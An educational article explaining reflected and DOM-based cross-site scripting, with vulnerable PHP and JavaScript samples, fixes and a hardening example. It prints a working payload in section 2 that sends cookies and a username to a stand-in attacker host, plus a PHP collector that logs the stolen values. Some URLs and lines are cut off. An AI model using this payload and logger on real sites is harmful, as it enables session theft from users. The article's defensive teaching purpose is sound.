All examples in this article are provided for educational and
defensive purposes only. Test XSS vulnerabilities only on applications you own or have explicit
permission to test.
Cross-Site Scripting (XSS) is one of the most common web security
vulnerabilities.
It occurs when user-controlled input is included in a web page without
proper validation or escaping, allowing attackers to execute
JavaScript in a victim’s browser.
In this article we will cover:
Reflected XSS (server-side)
DOM-based XSS (client-side)
Why malicious payloads are dangerous
How to test XSS safely
Expected results during testing
1. Reflected XSS via PHP GET Parameters
Vulnerable Code Example
<?php
echo "Welcome " . $_GET["name"] . " " . $_GET["surname"] . "!";
?>
Why This Code Is Vulnerable
The application takes user input from $_GET parameters and prints it
directly into the HTML output.
Because no sanitization or escaping is applied, any injected
JavaScript will be executed by the browser.
How to Test
Where to test: browser address bar
How to test: inject a harmless JavaScript payload
http://www.example-site-xss.co
Expected Result
A JavaScript alert box appears in the browser.
This confirms the presence of a Reflected XSS vulnerability.
Why This Is Dangerous
An attacker could use this vulnerability to:
Steal session cookies
Perform actions on behalf of the victim
Redirect users to malicious pages
2. XSS Payload Example (Data Exfiltration)
Example Payload (Demonstration Only)
<script>
var user = document.getElementById('curre
? document.getElementById('curre
: 'unknown';
var cookie = document.cookie;
new Image().src =
'https://attacker-site.com/log
encodeURIComponent(user) +
'&cookie=' +
encodeURIComponent(cookie);
</script>
What This Payload Does
The script:
Reads data from the page (such as the username)
Reads browser cookies
Sends the information to an external server
Important Warning
This payload should not be used for testing.
It is shown only to demonstrate the real impact of an XSS vulnerability.
For testing purposes, always use non-destructive payloads such as:
<script>alert(1)</script>
3. Server-Side Logging Example
<?php
$user = isset($_GET['user']) ? $_GET['user'] : '';
$cookie = isset($_GET['cookie']) ? $_GET['cookie'] : '';
$log = date('Y-m-d H:i:s') . " | " .
$_SERVER['REMOTE_ADDR'] .
" | user=" . $user .
" | cookie=" . $cookie . "\n";
file_put_contents(__DIR__ . "/log.txt", $log, FILE_APPEND | LOCK_EX);
?>
Purpose of This Example
This code demonstrates how stolen data could be collected and logged
by an attacker, highlighting why XSS vulnerabilities are considered
high risk.
4. DOM-Based XSS Using location.hash
Vulnerable JavaScript Code
var name = location.hash.slice(1);
document.write("Welcome " + name);
Why This Is Vulnerable
The location.hash value is fully controlled by the user.
Using document.write() inserts unescaped content directly into the
page, resulting in DOM-based XSS.
How to Test
Where to test: browser URL
How to test: inject payload after the # symbol
http://www.example-site-xss.co
Expected Result
The alert box is displayed.
The payload is executed entirely in the browser without any
server-side involvement.
5. Using the Browser Console
The browser console is not used to inject XSS, but to analyze and debug it.
Examples:
console.log(location.hash);
document.body.innerHTML;
The console helps identify where user input is flowing and which
JavaScript sinks are dangerous.
6. How to Fix These Vulnerabilities
Secure PHP Output
// ENT_QUOTES also encodes single quotes, so the escaped value is safe inside quoted attributes as well as in text
echo "Welcome " .
htmlspecialchars($_GET['name'] ?? '', ENT_QUOTES, 'UTF-8') . " " .
htmlspecialchars($_GET['surname'] ?? '', ENT_QUOTES, 'UTF-8') . "!";
Secure JavaScript Practices
Avoid:
document.write
innerHTML with user input
Use:
element.textContent = userInput;
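The two fixes above, as an added example that is not part of the original article: the "Welcome name surname" page from section 1 and the location.hash greeting from section 4 are modelled in plain JavaScript, each beside its hardened form, so the effect of escaping and of the textContent sink can be checked outside a browser. The function names and the probe string are this example's own.

```javascript
// Equivalent of PHP htmlspecialchars($s, ENT_QUOTES, 'UTF-8'): every character
// that can open a tag, close an attribute or start an entity is encoded.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#039;',
  })[c]);
}

// Server-side rendering as in section 1: input is concatenated unescaped.
function renderWelcomeVulnerable(name, surname) {
  return 'Welcome ' + name + ' ' + surname + '!';
}

// Hardened rendering as in section 6: output is escaped at the point of insertion.
function renderWelcomeSafe(name, surname) {
  return 'Welcome ' + escapeHtml(name) + ' ' + escapeHtml(surname) + '!';
}

// DOM sink from section 4, hardened: the fragment is assigned as text, never
// parsed as markup. `el` is any object with a textContent property (a real
// element in the browser, a plain object here so the code also runs under Node).
function setGreetingFromHash(el, hash) {
  const name = hash.startsWith('#') ? hash.slice(1) : hash;
  el.textContent = 'Welcome ' + name;
  return el.textContent;
}

// Review check for rendered output: does the HTML still contain a live
// <script> tag? Case-insensitive, because browsers are.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed harmless probe, the same one the article recommends for testing.
const PROBE = '<script>alert(1)</script>';

// Vulnerable output keeps the tag; hardened output turns it into inert text.
console.log(renderWelcomeVulnerable(PROBE, 'Doe'));
console.log(renderWelcomeSafe(PROBE, 'Doe'));
console.log(setGreetingFromHash({ textContent: '' }, '#' + PROBE));
```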
Additional Security Measures
Use HttpOnly and Secure cookies
Implement a strong Content Security Policy (CSP)
Validate input and escape output
Treat all user input as untrusted
XSS vulnerabilities can occur both on the server side and in
client-side JavaScript.
Understanding where input enters the application and how it is
rendered is essential for preventing XSS attacks.
Always test responsibly, fix vulnerabilities promptly, and prioritize
secure coding practices.